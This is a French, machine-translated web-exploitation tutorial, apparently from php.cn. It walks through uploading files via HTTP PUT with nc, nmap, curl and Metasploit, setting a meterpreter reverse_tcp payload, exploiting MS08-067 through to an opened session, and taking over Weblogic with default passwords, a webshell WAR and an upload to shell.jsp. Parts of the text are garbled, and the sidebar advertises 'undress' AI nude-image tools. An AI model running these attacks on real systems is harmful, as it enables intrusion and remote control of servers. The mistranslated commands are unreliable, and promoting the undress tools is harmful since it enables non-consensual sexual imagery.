Table des matières
Utilisez BurpSuite quotidiennement pour accéder au chemin cible de téléchargement afin de capturer le paquet de données, modifier la méthode de demande de paquet de données et le chemin de téléchargement, écrire le contenu du fichier dans le corps de la demande et envoyer le package à le serveur Web.
CURL est un outil de transfert de fichiers qui utilise la syntaxe URL pour fonctionner sous la ligne de commande. Il télécharge ou télécharge des données via l'URL spécifiée et affiche les données. Le c dans curl signifie client et URL est l'URL.
Commande :
2. Exploitation de la vulnérabilité SMB
3.1 Mot de passe faible de connexion backend
Maison Opération et maintenance Sécurité Exemple d'analyse des postures d'exploitation des vulnérabilités Web

Exemple d'analyse des postures d'exploitation des vulnérabilités Web

May 27, 2023 am 08:55 AM
web

1. Utilisation de la méthode HTTP PUT

PUT est une méthode utilisée pour la gestion des fichiers. Si le personnel d'exploitation et de maintenance n'a pas modifié la configuration par défaut du serveur Web et prend toujours en charge ces méthodes, il peut télécharger des fichiers sur le serveur. système de fichiers à volonté.

1.1. Netcat utilise la méthode PUT

Netcat est un outil réseau très connu, appelé "NC", et est connu sous le nom de "Swiss**" en matière de tests d'intrusion. Il peut implémenter plusieurs fonctions telles que la surveillance des ports, l'analyse des ports, le transfert de fichiers à distance et le shell distant.

Après avoir vérifié et connu la méthode PUT d'ouverture du service Web, entrez la commande suivante pour télécharger le fichier :

nc IP PORT

PUT /dav/hack.txt HTTP/1.1

Hôte : IP

Exemple danalyse des postures dexploitation des vulnérabilités Web

Appuyez deux fois sur Entrée. Vous pouvez voir que le fichier hacked.txt a été créé avec succès, le code d'état est 201 et l'emplacement de création du fichier est le répertoire /dav/.

1.2, Nmap utilise la méthode PUT

Commande :

nmap -p port IP -script http-put-script-args http-put.url='/dav/test.php',http-put.file ='/root/test.php'

Explication de la commande :

-script http-put //Sélectionnez le script http-put Le script prend en charge le téléchargement de fichiers à l'aide de la méthode http put. T -Script-rags // Définir le paramètre de script 1, 2

http-put.url = '/dav/test.php' // Définir le paramètre 1 est le chemin du fichier cible de téléchargement

http-put.file = ' /root/test.php' //Définissez le paramètre 2 sur le chemin du fichier local de téléchargement.

Exemple danalyse des postures dexploitation des vulnérabilités Web Vous pouvez voir sur l'image que le téléchargement via le script Nmap a réussi.

1.3 BurpSuite utilise la méthode PUT

Utilisez BurpSuite quotidiennement pour accéder au chemin cible de téléchargement afin de capturer le paquet de données, modifier la méthode de demande de paquet de données et le chemin de téléchargement, écrire le contenu du fichier dans le corps de la demande et envoyer le package à le serveur Web.

Exemple danalyse des postures dexploitation des vulnérabilités Web Le package de réponse du serveur indique que le fichier a été créé avec succès.

Exemple danalyse des postures dexploitation des vulnérabilités Web1.4 CURL utilise la méthode PUT

CURL est un outil de transfert de fichiers qui utilise la syntaxe URL pour fonctionner sous la ligne de commande. Il télécharge ou télécharge des données via l'URL spécifiée et affiche les données. Le c dans curl signifie client et URL est l'URL.

La commande pour créer un fichier via la méthode PUT est la suivante :

Commande 1 :

curl -i -XPUT -H « Content-Type : text/plain charset=utf-8 » -d « hack terminé » http://192.168.40.4/dav/hack.php

Exemple danalyse des postures dexploitation des vulnérabilités WebExplication de la commande :

-i/--include //Inclure les informations d'en-tête du protocole lors de la sortie

-X/--request //Spécifier la commande PUT

                                                                                                                                                                                                                    -H/--tête euh /HTTP La méthode POST écrit du texte dans le http://192.168.40.4/dav/hack.php créé

Commande 2 :

curl -i -X ​​​​​​PUT -H "Content-Type : application/xml; charset =utf-8″ -d @”F:1.php” http://192.168.40.4/dav/hack.php

Explication de la commande :

Exemple danalyse des postures dexploitation des vulnérabilités Web-d @“filename” //Lire à partir du contenu du fichier

1.5 Script QuickPuT utilisant la méthode PUT Exemple danalyse des postures dexploitation des vulnérabilités Web
En utilisant QuickPut, un outil de ligne de commande Python, nous pouvons utiliser la méthode HTTP PUT pour télécharger des fichiers sur le serveur.

Commande de téléchargement :

python2 QuickPut.py F:1.php http://192.168.40.4/dav/hack1.php

Explication de la commande :

Exemple danalyse des postures dexploitation des vulnérabilités Webpython QuickPut.py

1.6 Metasploit utilise la méthode PUT

Le module auxiliaire de Metasploit auxiliaire/scanner/http/http_put peut réaliser des opérations de téléchargement et de suppression de fichiers.

Commande :

Utiliser le module http_put pour l'analyse auxiliaire du service http

show options //Afficher les paramètres du module

Exemple danalyse des postures dexploitation des vulnérabilités Webset RHOSTS 192.168.40.4 //Définir l'adresse IP cible

set PATH /dav/ //Set le chemin cible

set payload php/meterpreter/reverse_tcp //Définir la charge utile de l'attaque

set filename msf.php //Définir le nom du fichier de téléchargement

Exemple danalyse des postures dexploitation des vulnérabilités Web

set FILEDATA file://root/test.php //Définir le chemin de données du fichier local de téléchargement

exploit //Démarrez l'attaque

Exemple danalyse des postures dexploitation des vulnérabilités Web

Le résultat renvoyé montre que le fichier a été téléchargé avec succès.

2. Exploitation de la vulnérabilité SMB

Après avoir effectué une analyse des ports de collecte d'informations, nous avons constaté que l'hôte a les ports 139 et 445 ouverts et que la bannière affiche Microsoft Windows. Cela conduira à l'association avec les vulnérabilités SMB des ports 139 et 445. Les plus courants sont ms17-010 , ms08-067, etc.

Détection de vulnérabilité

Commande :

namp --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse –sTIP

namp --script=/usr/share /nmap/scripts/smb-vuln-ms17-010.nse –sTIP

Explication de la commande :

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //Utiliser Script d'analyse des vulnérabilités Nmapms08-067

-sT //Utiliser l'analyse TCP

Si le résultat de sortie est :

smb-vuln-ms08-067 :

VULNÉRABLE :

Système Microsoft Windows vulnérable à l'exécution de code à distance (MS08-067 )

État : VULNÉRABLE

ID : CVE : CVE-2008-4250

Le service serveur dans Microsoft Windows 2000 SP4, XP SP2 et SP3, Server 2003 SP1 et SP2, Vista Gold et SP1, Server 2008 et 7 pré-bêta permet aux attaquants distants d'exécuter du code arbitraire via une requête RPC contrefaite qui déclenche le débordement lors de la canonisation du chemin. / ms08-067.aspx

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

indique que la vulnérabilité ms08-067 existe et ms17-010 est le pareil que ci-dessus.

Exploitation

Utilisez le module d'attaque MSF smb pour exploiter les vulnérabilités ms08-067 et ms17-010.

msf> utiliser exploit/windows/smb/ms08_067_netapimsfexploit(ms08_067_netapi) > définir RHOST IP

msfexploit(ms08_067_netapi) > le port IP d'écoute local

est automatiquement IP cible de détection : 445

[*] IP cible : 445- Empreinte digitale : Windows 2000 - Service Pack 0 - 4 - langue : Anglais

[*] IP cible : 445- Cible sélectionnée : Windows 2000 Universal

[*] IP cible : 445 - Tentative de déclenchement de la vulnérabilité...

[*]Étape d'envoi (957487 octets) à l'IP cible

[*]Session Meterpreter 2 ouverte (Surveillance du port IP-> Rebond du port cible)

meterpreter> ;

L'exploit ms17-010 est le même que ci-dessus.

3. Exploitation des vulnérabilités Weblogic

Lors des tests d'intrusion, nous rencontrons souvent des serveurs d'applications Weblogic Server. Après avoir vu Weblogic Server, nous pensons que Weblogic Server peut avoir des mots de passe faibles dans la gestion en arrière-plan, des vulnérabilités de désérialisation JAVA et des téléchargements de fichiers arbitraires. Vulnérabilités et bien d'autres vulnérabilités CVE dans cette version. Partageons comment exploiter diverses vulnérabilités dans Weblogic.

3.1 Mot de passe faible de connexion backend

Mot de passe faible de connexion au serveur Weblogic commun :

Exemple danalyse des postures dexploitation des vulnérabilités Webweblogic/weblogicweblogic/weblogic1weblogic/weblogic10

weblogic/weblogic123

🜜 s'il existe Connectez-vous au serveur d'applications Gérez l'arrière-plan et téléchargez le package webshellwar.

Téléchargez et déployez le package war sur le serveur d'applications

Exemple danalyse des postures dexploitation des vulnérabilités Web

Après avoir téléchargé et déployé avec succès le package war, vous pouvez visiter la Malaisie. La vulnérabilité CVE peut être directement détectée à l'aide de scripts, puis trouver des exploits de scripts exp en fonction du code de vulnérabilité.

Le script de détection de vulnérabilité Weblogic est très puissant et peut détecter divers CVE, chemins d'arrière-plan de gestion, SSRF, mots de passe faibles et prend en charge une expansion ultérieure. Exemple danalyse des postures dexploitation des vulnérabilités Web

Exemple danalyse des postures dexploitation des vulnérabilités Web

Vous pouvez également utiliser les outils d'exploitation des vulnérabilités de désérialisation Java pour détecter et exploiter directement. L'outil de vulnérabilité fournit des fonctions de détection de vulnérabilité, d'exécution de commandes, de téléchargement de fichiers et d'inspection par lots.

Exemple danalyse des postures dexploitation des vulnérabilités Web

3.3

Weblogic Vulnérabilité de téléchargement arbitraire de fichiers

Renvoyer les informations en faisant exploser Weblogic.

Exemple danalyse des postures dexploitation des vulnérabilités Web

Obtenez le mot de passe de connexion, le nom du service et le répertoire de caractères aléatoires, puis construisez et téléchargez le POC pour télécharger le fichier de test.

Transmettez les données suivantes sous le chemin /bea_wls_deployment_internal/DeploymentService

Exemple danalyse des postures dexploitation des vulnérabilités Web

Le serveur renvoie le succès du téléchargement et le chemin absolu du dossier.

Exemple danalyse des postures dexploitation des vulnérabilités Web

Le contenu du fichier téléchargé sera affiché après avoir accédé à ce chemin de fichier de téléchargement

http://IP/bea_wls_deployment_internal /shell.jsp# 🎜🎜#

Exemple danalyse des postures dexploitation des vulnérabilités Web

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Outils d'IA chauds

Undresser.AI Undress

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Undress AI Tool

Undress AI Tool

Images de déshabillage gratuites

Clothoff.io

Clothoff.io

Dissolvant de vêtements AI

AI Hentai Generator

AI Hentai Generator

Générez AI Hentai gratuitement.

Article chaud

R.E.P.O. Crystals d'énergie expliqués et ce qu'ils font (cristal jaune)
1 Il y a quelques mois By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Meilleurs paramètres graphiques
1 Il y a quelques mois By 尊渡假赌尊渡假赌尊渡假赌
Will R.E.P.O. Vous avez un jeu croisé?
1 Il y a quelques mois By 尊渡假赌尊渡假赌尊渡假赌

Outils chauds

Bloc-notes++7.3.1

Bloc-notes++7.3.1

Éditeur de code facile à utiliser et gratuit

SublimeText3 version chinoise

SublimeText3 version chinoise

Version chinoise, très simple à utiliser

Envoyer Studio 13.0.1

Envoyer Studio 13.0.1

Puissant environnement de développement intégré PHP

Dreamweaver CS6

Dreamweaver CS6

Outils de développement Web visuel

SublimeText3 version Mac

SublimeText3 version Mac

Logiciel d'édition de code au niveau de Dieu (SublimeText3)

Comment utiliser python+Flask pour réaliser la mise à jour et l'affichage en temps réel des journaux sur les pages Web Comment utiliser python+Flask pour réaliser la mise à jour et l'affichage en temps réel des journaux sur les pages Web May 17, 2023 am 11:07 AM

1. Enregistrez la sortie dans un fichier à l'aide du module : la journalisation peut générer des journaux de niveau personnalisé et peut générer des journaux vers un chemin spécifié. Niveau de journalisation : debug (journal de débogage) = 5) {clearTimeout (time) // Si tous sont obtenus 10 fois dans un. les lignes sont vides Tâche planifiée d'effacement du journal}return}if(data.log_type==2){//Si un nouveau journal est obtenu pour(i=0;i

Comment utiliser le caddy du serveur Web Nginx Comment utiliser le caddy du serveur Web Nginx May 30, 2023 pm 12:19 PM

Introduction à Caddy Caddy est un serveur Web puissant et hautement évolutif qui compte actuellement plus de 38 000 étoiles sur Github. Caddy est écrit en langage Go et peut être utilisé pour l'hébergement de ressources statiques et le proxy inverse. Caddy présente les principales caractéristiques suivantes : par rapport à la configuration complexe de Nginx, sa configuration originale de Caddyfile est très simple ; il peut modifier dynamiquement la configuration via l'AdminAPI qu'il fournit, il prend en charge la configuration HTTPS automatisée par défaut et peut demander automatiquement des certificats HTTPS ; et configurez-les ; il peut être étendu aux données Des dizaines de milliers de sites ; peut être exécuté n'importe où sans dépendances supplémentaires écrites en langage Go, la sécurité de la mémoire est plus garantie ; Tout d’abord, nous l’installons directement dans CentO

Utilisation de Jetty7 pour le traitement du serveur Web dans le développement d'API Java Utilisation de Jetty7 pour le traitement du serveur Web dans le développement d'API Java Jun 18, 2023 am 10:42 AM

Utilisation de Jetty7 pour le traitement du serveur Web dans le développement JavaAPI Avec le développement d'Internet, le serveur Web est devenu l'élément central du développement d'applications et est également au centre de l'attention de nombreuses entreprises. Afin de répondre aux besoins croissants des entreprises, de nombreux développeurs choisissent d'utiliser Jetty pour le développement de serveurs Web, et sa flexibilité et son évolutivité sont largement reconnues. Cet article explique comment utiliser Jetty7 dans le développement JavaAPI pour We

Protection en temps réel contre les barrages de blocage de visage sur le Web (basée sur l'apprentissage automatique) Protection en temps réel contre les barrages de blocage de visage sur le Web (basée sur l'apprentissage automatique) Jun 10, 2023 pm 01:03 PM

Le barrage de blocage du visage signifie qu'un grand nombre de barrages flottent sans bloquer la personne dans la vidéo, donnant l'impression qu'ils flottent derrière la personne. L'apprentissage automatique est populaire depuis plusieurs années, mais beaucoup de gens ne savent pas que ces fonctionnalités peuvent également être exécutées dans les navigateurs. Cet article présente le processus d'optimisation pratique des barrages vidéo. À la fin de l'article, il répertorie certains scénarios applicables. cette solution, dans l'espoir de l'ouvrir. mediapipeDemo (https://google.github.io/mediapipe/) montre le principe de mise en œuvre du calcul d'arrière-plan du serveur vidéo de téléchargement à la demande du barrage de blocage de visage grand public pour extraire la zone du portrait dans l'écran vidéo et la convertit en stockage SVG client pendant la lecture de la vidéo. Téléchargez svg depuis le serveur et combinez-le avec barrage, portrait.

Comment implémenter la validation de formulaire pour les applications Web à l'aide de Golang Comment implémenter la validation de formulaire pour les applications Web à l'aide de Golang Jun 24, 2023 am 09:08 AM

La validation du formulaire est un maillon très important dans le développement d'applications Web. Elle permet de vérifier la validité des données avant de soumettre les données du formulaire afin d'éviter les failles de sécurité et les erreurs de données dans l'application. La validation de formulaire pour les applications Web peut être facilement implémentée à l'aide de Golang. Cet article explique comment utiliser Golang pour implémenter la validation de formulaire pour les applications Web. 1. Éléments de base de la validation de formulaire Avant de présenter comment implémenter la validation de formulaire, nous devons savoir quels sont les éléments de base de la validation de formulaire. Éléments de formulaire : les éléments de formulaire sont

Comment configurer nginx pour garantir que le serveur frps et le port de partage Web 80 Comment configurer nginx pour garantir que le serveur frps et le port de partage Web 80 Jun 03, 2023 am 08:19 AM

Tout d’abord, vous aurez un doute, qu’est-ce que le frp ? En termes simples, frp est un outil de pénétration intranet. Après avoir configuré le client, vous pouvez accéder à l'intranet via le serveur. Maintenant, mon serveur a utilisé nginx comme site Web et il n'y a qu'un seul port 80. Alors, que dois-je faire si le serveur FRP souhaite également utiliser le port 80 ? Après l'interrogation, cela peut être réalisé en utilisant le proxy inverse de nginx. A ajouter : frps est le serveur, frpc est le client. Étape 1 : Modifiez le fichier de configuration nginx.conf sur le serveur et ajoutez les paramètres suivants à http{} dans nginx.conf, server{listen80

Que sont les standards du Web ? Que sont les standards du Web ? Oct 18, 2023 pm 05:24 PM

Les normes Web sont un ensemble de spécifications et de directives développées par le W3C et d'autres organisations associées. Elles incluent la normalisation du HTML, CSS, JavaScript, DOM, l'accessibilité du Web et l'optimisation des performances. En suivant ces normes, la compatibilité des pages peut être améliorée. , maintenabilité et performances. L'objectif des normes Web est de permettre au contenu Web d'être affiché et d'interagir de manière cohérente sur différentes plates-formes, navigateurs et appareils, offrant ainsi une meilleure expérience utilisateur et une meilleure efficacité de développement.

Comment activer l'accès administratif à partir de l'interface utilisateur Web du cockpit Comment activer l'accès administratif à partir de l'interface utilisateur Web du cockpit Mar 20, 2024 pm 06:56 PM

Cockpit est une interface graphique Web pour les serveurs Linux. Il est principalement destiné à faciliter la gestion des serveurs Linux pour les utilisateurs nouveaux/experts. Dans cet article, nous aborderons les modes d'accès à Cockpit et comment basculer l'accès administratif à Cockpit depuis CockpitWebUI. Sujets de contenu : Modes d'entrée du cockpit Trouver le mode d'accès actuel au cockpit Activer l'accès administratif au cockpit à partir de CockpitWebUI Désactiver l'accès administratif au cockpit à partir de CockpitWebUI Conclusion Modes d'entrée au cockpit Le cockpit dispose de deux modes d'accès : Accès restreint : il s'agit de la valeur par défaut pour le mode d'accès au cockpit. Dans ce mode d'accès vous ne pouvez pas accéder à l'internaute depuis le cockpit

See all articles